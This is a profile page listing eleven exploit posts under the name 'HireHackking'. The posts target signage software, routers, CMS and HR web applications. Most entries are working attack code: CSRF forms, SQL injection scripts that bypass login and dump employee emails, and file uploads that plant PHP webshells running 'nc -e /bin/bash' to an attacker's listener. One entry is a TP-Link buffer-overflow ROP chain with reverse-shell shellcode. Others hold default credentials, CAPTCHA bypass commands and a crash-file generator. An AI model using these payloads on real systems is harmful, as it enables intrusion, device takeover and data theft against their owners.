Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF) # Date: 2020-07-16 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.yerootech.com # Version: 6.2 iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery (CSRF) Vendor: Guangzhou Yeroo Tech Co., Ltd. Product web page: http://www.yerootech.com Affected version: V6.2 B2014.12.12.1220 V5.6 B2017.07.12.1757 V4.3 Summary: iDS6 Software's DSSPro network digital signage management system is a web-based server software solution for Windows. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Microsoft Windows XP Microsoft Windows 7 Microsfot Windows Server 2008 Microsoft Windows Server 2012 Microsoft Windows 10 Apache Tomcat/8.0.44 Apache Tomcat/6.0.35 Apache-Coyote/1.1 Apache Axis/1.4 MySQL 5.5.25 Java 1.8.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5606 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5606.php 16.07.2020 -- Add user: --------- <html> <body> <form action="http://192.168.1.88/Pages/user!addUser" method="POST"> <input type="hidden" name="user.userName" value="testingus" /> <input type="hidden" name="user.password" value="zeroscience" /> <input type="submit" value="add()" /> </form> </body> </html>
  2. HireHackking

    Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution # Date: 4-11-2020 # Exploit Author: mosaaed # Vendor Homepage: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip # Version: 1.0 # Tested on: Parrot 5.5.17 + Apache 2.4.46 # replace shell.php with your own php reverse shell # change [TARGET URL] to target URL or IP address # setup your netcat listener for sum good ol shellz #!/usr/bin/python3 import requests import time def sqli_admin(): s = requests.Session() data = {"username":"admin'or'1'=1#","password":"mosaaed"} adminlogin = "http://localhost/sta/ajax.php?action=save_settings" s.post(adminlogin,data=data) return s def trigger_rce(session): starttime = int(time.time()) multipart_form_data = { "name": ("cyberscurity"), "email": ("test@test.com"), "contact" : ("+11111111111"), "about" : ("attack"), "img" : ("shell.php", open("shell.php", "rb")) } session.post("http://localhost/sta/ajax.php?action=save_settings", files=multipart_form_data) get_shell(starttime-100,starttime+100,session) def get_shell(start,end,session): for i in range(start,end): session.get("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php") response = requests.get ("http://localhost/sta/assets/uploads/"+ str(i) +"_shell.php") if response.status_code == 200: print("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php") def main(): session = sqli_admin() trigger_rce(session) if __name__ == '__main__': main()
  3. HireHackking

    iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass # Date: 2020-07-16 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.yerootech.com # Version: 6.2 iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass Vendor: Guangzhou Yeroo Tech Co., Ltd. Product web page: http://www.yerootech.com Affected version: V6.2 B2014.12.12.1220 V5.6 B2017.07.12.1757 V4.3 Summary: iDS6 Software's DSSPro network digital signage management system is a web-based server software solution for Windows. Desc: The CAPTCHA function for DSSPro is prone to a security bypass vulnerability that occurs in the CAPTCHA authentication routine. By requesting the autoLoginVerifyCode object an attacker can receive a JSON message code and successfully bypass the CAPTCHA-based authentication challenge and perform brute-force attacks. Tested on: Microsoft Windows XP Microsoft Windows 7 Microsfot Windows Server 2008 Microsoft Windows Server 2012 Microsoft Windows 10 Apache Tomcat/8.0.44 Apache Tomcat/6.0.35 Apache-Coyote/1.1 Apache Axis/1.4 MySQL 5.5.25 Java 1.8.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5607 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php 16.07.2020 -- Get CAPTCHA code: ----------------- $ curl -i http://192.168.1.88/Pages/login\!autoLoginVerifyCode -c cookies.txt {"success":true,"message":"6435","data":"6435"} Use CAPTCHA code: ----------------- $ curl -i http://192.168.1.88/Pages/login\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT Set-Cookie: cookie.autosave=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT Cache-Control: no-cache Pragma: no-cache Content-Type: application/x-json;charset=UTF-8 Date: Tue, 21 Jul 2020 19:41:26 GMT Connection: close Content-Length: 16 {"success":true}
  4. HireHackking

    Amarok 2.8.0 - Denial-of-Service

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Amarok 2.8.0 - Denial-of-Service # Date: 1 November 2020 # Exploit Author: FishballAndMeatball # Vendor Homepage: https://amarok.kde.org/ # Software link: https://community.kde.org/Amarok/GettingStarted/Download # Version: Amarok 2.8.0 # Tested on: Windows 10, Windows 7, Windows XP # CVE: CVE-2020-13152 my $file= “test_big.m3u“; my $junk= “\x41” x 6368545; open($FILE,”>$file”); print $FILE “$junk”; close($FILE); print “m3u File Created successfully\n”;
  5. HireHackking

    iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation # Date: 2020-07-16 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.yerootech.com # Version: 6.2 iDS6 DSSPro Digital Signage System 6.2 Improper Access Control Privilege Escalation Vendor: Guangzhou Yeroo Tech Co., Ltd. Product web page: http://www.yerootech.com Affected version: V6.2 B2014.12.12.1220 V5.6 B2017.07.12.1757 V4.3 Summary: iDS6 Software's DSSPro network digital signage management system is a web-based server software solution for Windows. Desc: The application suffers from a privilege escalation vulnerability. An authenticated user can elevate his/her privileges by calling JS functions from the console or by insecure direct object references to hidden functionalities that can result in creating users, modifying roles and permissions and full takeover of the application. Tested on: Microsoft Windows XP Microsoft Windows 7 Microsfot Windows Server 2008 Microsoft Windows Server 2012 Microsoft Windows 10 Apache Tomcat/8.0.44 Apache Tomcat/6.0.35 Apache-Coyote/1.1 Apache Axis/1.4 MySQL 5.5.25 Java 1.8.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5608 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5608.php 16.07.2020 -- -------------------- Default credentials: -------------------- admin:123456 (id: n/k, access: /admin) boss:boss (id: 100001, access: /) user:user (id: 100002, access: /) ---------------------------- Once logged-in, create user: ---------------------------- In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action) Type: add() or issue a POST request: $ curl -d "user.userName=testingus&user.password=testingus" http://192.168.1.88/Pages/user\!addUser -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" -------------- List user IDs: -------------- $ curl -d "az=asc" http://192.168.1.88/Pages/user\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" ------------ Create role: ------------ In Console, once navigated to the Accounts->Role page (http://192.168.1.88/Pages/role.action): Type: add() or issue a POST request: $ curl -d "role.roleName=ROLENAME&role.description=ROLEDESC" http://192.168.1.88/Pages/role\!add -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" -------------- List role IDs: -------------- $ curl -X POST http://192.168.1.88/Pages/role\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" ------------------------------------------ Apply all permissions to the created role: ------------------------------------------ $ curl http://192.168.1.88/Pages/role\!updatePermissions -d "role.roleId={ROLE_ID}&privileges=2&privileges=1&privileges=3&privileges=4&privileges=7&privileges=6&privileges=5&privileges=12&privileges=8&privileges=13&privileges=9&privileges=10&privileges=11&privileges=14&privileges=16&privileges=15&privileges=17&privileges=18&privileges=21&privileges=33&privileges=32&privileges=34&privileges=35&privileges=36&privileges=37&privileges=23&privileges=22&privileges=24&privileges=41&privileges=47&privileges=46&privileges=48&privileges=49&privileges=50&privileges=51&privileges=52&privileges=53" ------------------------------------ Assign created role to created user: ------------------------------------ $ curl -d "user.userId={USER_ID}&roles={ROLE_ID}" http://192.168.1.88/Pages/user\!updateRole -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" ------------ Delete user: ------------ In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action), select desired username: Type: del() or issue a POST request: $ curl -d "userid={USER_ID}" http://192.168.1.88/Pages/user\!del -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
  6. HireHackking

    SmartBlog 2.0.1 - 'id_post' Blind SQL injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SmartBlog 2.0.1 - 'id_post' Blind SQL injection # Date: 2020-11-05 # Exploit Author: C0wnuts # Vendor Homepage: https://github.com/smartdatasoft/smartblog # Version: 2.0.1 # Tested on: Linux # Description : A blind SQL injection is present in the "id_post" parameter of the "details" controller. It allows you to extract information from the database by means of successive character tests. # POC: # ------------------------- # http://localhost/[script_path]/index.php?fc=module&module=smartblog&id_post=<valid post number> or {SQL}&controller=details # ------------------------- # Exemple: # 1. Test if the first character of the database name is "t": # http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring(DATABASE(),1,1)='t'&controller=details # 2. Test if the first character of the email of the first account is "a": # http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring((SELECT email FROM ps_employee LIMIT 1 offset 0),1,1)='a'&controller=details # ------------------------- # Script PYTHON (python 3) import requests, string from requests.adapters import HTTPAdapter from requests.packages.urllib3.util.retry import Retry initialUrl = 'https://localhost.com/index.php?fc=module&module=smartblog&id_post=4329824944' endOfUrl = '&controller=details' # Change this to http:// if the website is not in https protocol = "https://" offset = 0 endData = 0 end = 0 iteration = 0 charList = string.printable # The character returned by the db when you reach the end of the extracted information. In my case that was "+" but it can be "\", or " " or whatever. /!\ Just test and hange this value according to your needs /!\ endChar = "+" # The length of the page when the SQLI failed. In my case that was 16094. If the lenght of the content of the page is higher than this value is that the character tested is the right one. /!\ Just test and hange this value according to your needs /!\. FailPageLen = 17000 # Mysql is not case sensitive but if the db used by the website is cse sensitive remove the following line charList = charList.replace("ABCDEFGHIJKLMNOPQRSTUVWXYZ","") while endData == 0: contentInfo = "" iteration = 0 end = 0 while end == 0: iteration = iteration + 1 for elem in charList: url = initialUrl #This request get email of all employee. Replace the request by whatever you want but keep in mind that the script extract information 1 character by 1 character then you need to keep '+str(offset)+' and substring(,'+str(iteration)+',1). "elem" is the character tested request = '%20or%20substring((SELECT%20email%20FROM%20ps_employee%20LIMIT%201%20offset%20'+str(offset)+'),'+str(iteration)+',1)=%27'+elem+'%27' url += request + endOfUrl retry_strategy = Retry( total = 30, backoff_factor = 0.2, method_whitelist = ["GET" "POST"] ) adapter = HTTPAdapter(max_retries=retry_strategy) http = requests.Session() http.mount(protocol, adapter) response = http.get("{}".format(url)) if len(response.content) > FailPageLen: print(contentInfo) if(elem == endChar): end = 1 if contentInfo == "": endData = 1 else: contentInfo = contentInfo + elem break if contentInfo == "": endData = 1 print(contentInfo) offset = offset + 1
  7. HireHackking

    TP-Link WDR4300 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TP-Link WDR4300 - Remote Code Execution (Authenticated) # Date: 2020-08-28 # Exploit Author: Patrik Lantz # Vendor Homepage: https://www.tp-link.com/se/home-networking/wifi-router/tl-wdr4300/ # Version: TL-WDR4300, N750 Wireless Dual Band Gigabit Router # Tested on: Firmware version 3.13.33 and 3.14.3 # CVE : CVE-2017-13772 #!/usr/bin/python3 import sys import hashlib import base64 import requests import binascii import socket """ RCE via stack-based overflow on TP-Link WDR4300 (N750) devices, using CVE-2017-13772. Tested on Firmware versions 3.13.33, Build 130618 and 3.14.3 Build 150518, hardware WDR4300 v1 Usage: 1) Start listener on attacker machine: nc -nlvvp 31337 2) Execute script: python exploit.py <attacker_ip> """ def main(argv): if len(sys.argv) < 2: print("Usage: python exploit.py <attacker_ip>") sys.exit(1) password = "admin" target = "192.168.0.1:80" attacker_ip = sys.argv[1] attacker = binascii.hexlify(socket.inet_aton(attacker_ip)) ip = [attacker[i:i+2] for i in range(0, len(attacker), 2)] if '00' in ip or '20' in ip: print("[-] Specified attacker IP will result in bad characters being present in the shellcode. Avoid any IPs containing .0. and .32.") sys.exit(1) url = "http://" + target + "/" try: r = requests.get(url=url) except: print("[-] Could not connect to target: " + target) sys.exit(1) if 'WWW-Authenticate' in r.headers.keys(): if not 'WDR4300' in r.headers['WWW-Authenticate']: print("[-] This is not TP-Link WDR4300 (N750)") sys.exit(1) else: print("[-] This does not seem to be the web interface of a router!") credentials = "admin" + ":" + hashlib.md5(password).hexdigest() auth = base64.b64encode(credentials) url = "http://" + target + "/userRpm/LoginRpm.htm?Save=Save" print("[+] Setting target to: " + target) print("[+] Using default admin password: " + password) print("[+] Cookie set to: Authorization=Basic%20" + auth) h = {} h["Cookie"] = "Authorization=Basic%20" + auth h['Upgrade-Insecure-Requests'] = '1' h['Referer'] = 'http://' + target + '/' r = requests.get(url = url, headers=h) data = r.text if "httpAutErrorArray" in data: print('[-] Could not login to the admin interface') sys.exit(1) older_fw = False # older firmware, e.g., 3.13.33 if "<TITLE>Login Incorrect</TITLE>" in data: print("[-] Incorrect login, perhaps an older firmware? Sending digest authetnication using the Authorization header instead..") credentials = "admin:" + password auth = base64.b64encode(credentials) url = "http://" + target + "/" h = {} h["Authorization"] = "Basic%20" + auth h['Upgrade-Insecure-Requests'] = '1' h['Referer'] = 'http://' + target + '/' r = requests.get(url = url, headers=h) data = r.text if 'window.parent.location.href' not in data: print("[-] Failed to login to the admin interface") sys.exit(1) print('[+] Older firmware confirmed, successfully logged in') older_fw = True authenticated_url = data.split('window.parent.location.href = ')[1].split(';')[0].replace('"','') unique_id = '' if not older_fw: unique_id = authenticated_url.split('/userRpm')[0].split('/')[3] + '/' print("[+] Authentication succeeded, got unique id: " + unique_id.replace('/','')) # now we deliver the exploit payload via a GET request h['Referer'] = 'http://' + target + '/' + unique_id + 'userRpm/DiagnosticRpm.htm' # NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes) nopsled = "" for i in range(12): nopsled += "\x26\x40\x08\x01" # identified bad characters: 0x20,0x00 # Using reverse tcp shellcode from https://www.exploit-db.com/exploits/45541 buf = b"" buf += "\x24\x0f\xff\xfa" # li $t7, -6 buf += "\x01\xe0\x78\x27" # nor $t7, $zero buf += "\x21\xe4\xff\xfd" # addi $a0, $t7, -3 buf += "\x21\xe5\xff\xfd" # addi $a1, $t7, -3 buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1 buf += "\x24\x02\x10\x57" # li $v0, 4183 ( sys_socket ) buf += "\x01\x01\x01\x0c" # syscall 0x40404 buf += "\xaf\xa2\xff\xff" # sw $v0, -1($sp) buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp) buf += "\x34\x0f\xff\xfd" # li $t7, -3 ( sa_family = AF_INET ) buf += "\x01\xe0\x78\x27" # nor $t7, $zero buf += "\xaf\xaf\xff\xe0" # sw $t7, -0x20($sp) buf += "\x3c\x0e\x7a\x69" # lui $t6, 0x7a69 ( sin_port = 0x7a69 ) buf += "\x35\xce\x7a\x69" # ori $t6, $t6, 0x7a69 buf += "\xaf\xae\xff\xe4" # sw $t6, -0x1c($sp) buf += "\x3c\x0e" + ip[0].decode('hex') + ip[1].decode('hex') # lui $t6, 0xAABB ( sin_addr = 0xAABB ... buf += "\x35\xce" + ip[2].decode('hex') + ip[3].decode('hex') # ori $t6, $t6, 0xCCDD ... 0xCCDD buf += "\xaf\xae\xff\xe6" # sw $t6, -0x1a($sp) buf += "\x27\xa5\xff\xe2" # addiu $a1, $sp, -0x1e buf += "\x24\x0c\xff\xef" # li $t4, -17 ( addrlen = 16 ) buf += "\x01\x80\x30\x27" # nor $a2, $t4, $zero buf += "\x24\x02\x10\x4a" # li $v0, 4170 ( sys_connect ) buf += "\x01\x01\x01\x0c" # syscall 0x40404 buf += "\x24\x0f\xff\xfd" # li t7,-3 buf += "\x01\xe0\x28\x27" # nor a1,t7,zero buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp) buf += "\x24\x02\x0f\xdf" # li $v0, 4063 ( sys_dup2 ) buf += "\x01\x01\x01\x0c" # syscall 0x40404 buf += "\x24\xa5\xff\xff" # addi a1,a1,-1 (\x20\xa5\xff\xff) buf += "\x24\x01\xff\xff" # li at,-1 buf += "\x14\xa1\xff\xfb" # bne a1,at, dup2_loop buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1 buf += "\x3c\x0f\x2f\x2f" # lui $t7, 0x2f2f buf += "\x35\xef\x62\x69" # ori $t7, $t7, 0x6269 buf += "\xaf\xaf\xff\xec" # sw $t7, -0x14($sp) buf += "\x3c\x0e\x6e\x2f" # lui $t6, 0x6e2f buf += "\x35\xce\x73\x68" # ori $t6, $t6, 0x7368 buf += "\xaf\xae\xff\xf0" # sw $t6, -0x10($sp) buf += "\xaf\xa0\xff\xf4" # sw $zero, -0xc($sp) buf += "\x27\xa4\xff\xec" # addiu $a0, $sp, -0x14 buf += "\xaf\xa4\xff\xf8" # sw $a0, -8($sp) buf += "\xaf\xa0\xff\xfc" # sw $zero, -4($sp) buf += "\x27\xa5\xff\xf8" # addiu $a1, $sp, -8 buf += "\x24\x02\x0f\xab" # li $v0, 4011 (sys_execve) buf += "\x01\x01\x01\x0c" # syscall 0x40404 shellcode = nopsled + buf """ We control $ra, $s0 and $s1 via the buffer overflow. libc_base: 0x2aae2000 First ROP (sleep_gadget): 0x0004c974 + libc_base = 0x2ab2e974 0x0004c97c move t9, s0 0x0004c980 lw ra, (var_1ch) 0x0004c984 lw s0, (var_18h) 0x0004c988 addiu a0, zero, 2 ; arg1 0x0004c98c addiu a1, zero, 1 ; arg2 0x0004c990 move a2, zero 0x0004c994 jr t9 sleep is located at 0x00053ca0 => so $s0 = 0x2ab35ca0 This gadget calls sleep, in this gadget we also set the return adress to the second ROP gadget which is controlled by setting appropriate value on the stack location 0x1c($sp), i.e., the first value on the stack, due to the instruction at 0x0004c980. Second ROP (stack_gadget): 0x00039fa8 + libc_base = 0x2ab1bfa8 0x00039fa8 addiu s0, sp, 0x28 0x00039fac move a0, s3 0x00039fb0 move a1, s0 0x00039fb4 move t9, s1 0x00039fb8 jalr t9 This gadget will set s0 to point our shellcode on the stack, that must be located at sp+0x28. Then as we control s1, we jump to the last and third ROP gadget. Third ROP (call_gadget): 0x000406d8 + libc_base = 0x2ab226d8 0x000406d8 move t9, s0 0x000406dc jalr t9 Jump to the shellcode pointed in s0. """ sleep_addr = "\x2a\xb3\x5c\xa0" sleep_gadget = "\x2a\xb2\xe9\x74" stack_gadget = "\x2a\xb1\xbf\xa8" call_gadget = "\x2a\xb2\x26\xd8" junk = "J"*28 payload = "A"*160 + sleep_addr + call_gadget + sleep_gadget + junk + stack_gadget + shellcode p = {'ping_addr': payload, 'doType': 'ping', 'isNew': 'new', 'sendNum': '4', 'pSize':64, 'overTime':'800', 'trHops':'20'} url = "http://" + target + "/" + unique_id + "userRpm/PingIframeRpm.htm" print("[+] Delivering exploit payload to: " + url) try: r = requests.get(url = url, params=p, headers=h, timeout=10) except: print("[+] Finished delivering exploit") if __name__ == "__main__": main(sys.argv[1:])
  8. HireHackking

    CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020.09.30 # Exploit Author: Fatih Çelik # Vendor Homepage: https://github.com/boiteasite/cmsuno/ # Software Link: https://github.com/boiteasite/cmsuno/ # Blog: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html # Version: 1.6.2 # Tested on: Kali Linux 2020.2 import requests from bs4 import BeautifulSoup import lxml import json username = input("username: ") password = input("password: ") root_url = input("Root URL: http://192.168.1.9/cmsuno --> ") listener_ip = input("Your ip: ") listener_port = input("Your port for reverse shell: ") login_url = root_url + "/uno.php" vulnerable_url = root_url + "/uno/central.php" session = requests.Session() request = session.get(login_url) # Get the unox value soup = BeautifulSoup(request.text,"lxml") unox = soup.find("input",{'name':'unox'})['value'] # Login body = {"unox":unox,"user":username,"pass":password} session.post(login_url, data=body) # Get the second unox value request = session.get(login_url) unox = soup.find("input",{'name':'unox'})['value'] # Exploit header = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0", "Accept":"*/", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Origin": login_url, "Connection": "close", "Referer": login_url } payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port) while True: body = 'action=sauvePass&unox={}&user0=&pass0=&user=&pass=&lang={}'.format(unox,payload) session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header) request = session.get(login_url) text = request.text soup = BeautifulSoup(text,"lxml") script = soup.findAll('script')[1].string data = script.split("Unox='")[1] unox = data.split("',")[0]
  9. HireHackking

    Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020.10.06 # Exploit Author: Fatih Çelik # Vendor Homepage: https://sourceforge.net/projects/sentrifugo/ # Software Link: https://sourceforge.net/projects/sentrifugo/ # Blog: https://fatihhcelik.blogspot.com/2020/10/sentrifugo-version-32-rce-authenticated.html # Version: 3.2 # Tested on: Kali Linux 2020.2 # CVE : N/A import requests from bs4 import BeautifulSoup from ast import literal_eval ''' You should change the below hardcoded inputs to get a reverse shell. ''' login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave" upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/announcements/uploadsave" call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/ca_temp/" username = "xxx" password = "xxx" attacker_ip = "XXX.XXX.XXX.XXX" listener_port = "4444" # Set proxy for debugging purposes proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"} # Log in to the system session = requests.Session() request = session.get(login_url) body = {"username":username,"password":password} # session.post(login_url, data=body, proxies=proxy) session.post(login_url, data=body) # Send a request without proxy print("Logged in to the application..") # Upload the PHP shell files = [ ('myfile', ('shell.php', '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip,listener_port), 'image/jpeg') ) ] # r = session.post(upload_url, files=files, proxies=proxy) r = session.post(upload_url, files=files) # Send a request without proxy response = r.content dict_str = response.decode("UTF-8") response = literal_eval(dict_str) # Convert bytes to dictionary filename = response["filedata"]["new_name"] url = call_shell + filename print("PHP file is uploaded --> {}".format(url)) # Trigger the shell session.get(url)
  10. HireHackking

    Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020.10.06 # Exploit Author: Fatih Çelik # Vendor Homepage: https://sourceforge.net/projects/sentrifugo/ # Software Link: https://sourceforge.net/projects/sentrifugo/ # Blog: https://fatihhcelik.blogspot.com/2020/10/sentrifugo-version-32-rce-authenticated_6.html # Version: 3.2 # Tested on: Kali Linux 2020.2 # CVE : N/A import requests from bs4 import BeautifulSoup from ast import literal_eval ''' You should change the below hardcoded inputs to get a reverse shell. ''' login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave" upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/assets/assets/uploadsave" call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/assets_images_temp/" username = "xxxx" password = "xxxx" attacker_ip = "XXX.XXX.XXX.XXX" listener_port = "4444" # Set proxy for debugging purposes proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"} # Log in to the system session = requests.Session() request = session.get(login_url) body = {"username":username,"password":password} # session.post(login_url, data=body, proxies=proxy) session.post(login_url, data=body) # Send a request without proxy print("Logged in to the application..") # Upload the PHP shell files = [ ('myfile', ('shell.php', '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip,listener_port), 'image/jpeg') ) ] # r = session.post(upload_url, files=files, proxies=proxy) r = session.post(upload_url, files=files) # Send a request without proxy response = r.content dict_str = response.decode("UTF-8") response = literal_eval(dict_str) # Convert bytes to dictionary filename = response["filedata"]["new_name"] url = call_shell + filename print("PHP file is uploaded --> {}".format(url)) # Trigger the shell session.get(url)
  11. HireHackking

    Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF # Date: 28-08-2020 # Vendor Homepage: https://www.gxgroup.eu/ont-products/ # Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec) # Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/ # Version: v2.1 (software version P4410-V2-1.28) # CVE : CVE-2020-25015 1. Description Platinum 4410 is a compact router from Genexis that is commonly used at homes and offices. Hardware version V2.1 – Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password. 2. Impact An attacker can send the victim a link, which if he clicks while he is connected to the WiFi network established from the vulnerable router, the password of the WIFI access point will get changed via CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the router’s web-based setup page (192.168.1.1), essentially making this a one-click hack. 3. Proof of Concept Create an HTML file with the following code: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST"> <input type="hidden" name="wlEnbl" value="ON" /> <input type="hidden" name="hwlKeys0" value="" /> <input type="hidden" name="hwlKeys1" value="" /> <input type="hidden" name="hwlKeys2" value="" /> <input type="hidden" name="hwlKeys3" value="" /> <input type="hidden" name="hwlgMode" value="9" /> <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" /> <input type="hidden" name="hwlEnbl" value="1" /> <input type="hidden" name="hWPSMode" value="1" /> <input type="hidden" name="henableSsid" value="1" /> <input type="hidden" name="hwlHide" value="0" /> <input type="hidden" name="isInWPSing" value="0" /> <input type="hidden" name="WpsConfModeAll" value="7" /> <input type="hidden" name="WpsConfModeNone" value="0" /> <input type="hidden" name="hWpsStart" value="0" /> <input type="hidden" name="isCUCSupport" value="0" /> <input type="hidden" name="SSIDPre" value="N&#47;A" /> <input type="hidden" name="bwControlhidden" value="0" /> <input type="hidden" name="ht&#95;bw" value="1" /> <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" /> <input type="hidden" name="wlChannel" value="0" /> <input type="hidden" name="wlTxPwr" value="1" /> <input type="hidden" name="wlSsidIdx" value="0" /> <input type="hidden" name="SSID&#95;Flag" value="0" /> <input type="hidden" name="wlSsid" value="JINSON" /> <input type="hidden" name="wlMcs" value="33" /> <input type="hidden" name="bwControl" value="1" /> <input type="hidden" name="giControl" value="1" /> <input type="hidden" name="enableSsid" value="on" /> <input type="hidden" name="wlAssociateNum" value="32" /> <input type="hidden" name="wlSecurMode" value="WPAand11i" /> <input type="hidden" name="wlPreauth" value="off" /> <input type="hidden" name="wlNetReauth" value="1" /> <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" /> <input type="hidden" name="cb&#95;enablshowpsw" value="on" /> <input type="hidden" name="wlWpaGtkRekey" value="" /> <input type="hidden" name="wlRadiusIPAddr" value="" /> <input type="hidden" name="wlRadiusPort" value="" /> <input type="hidden" name="wlRadiusKey" value="" /> <input type="hidden" name="wlWpa" value="TKIPAES" /> <input type="hidden" name="wlKeyBit" value="64" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="WpsActive" value="0" /> <input type="hidden" name="wpsmode" value="ap&#45;pbc" /> <input type="hidden" name="pinvalue" value="" /> <input type="hidden" name="Save&#95;Flag" value="1" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged 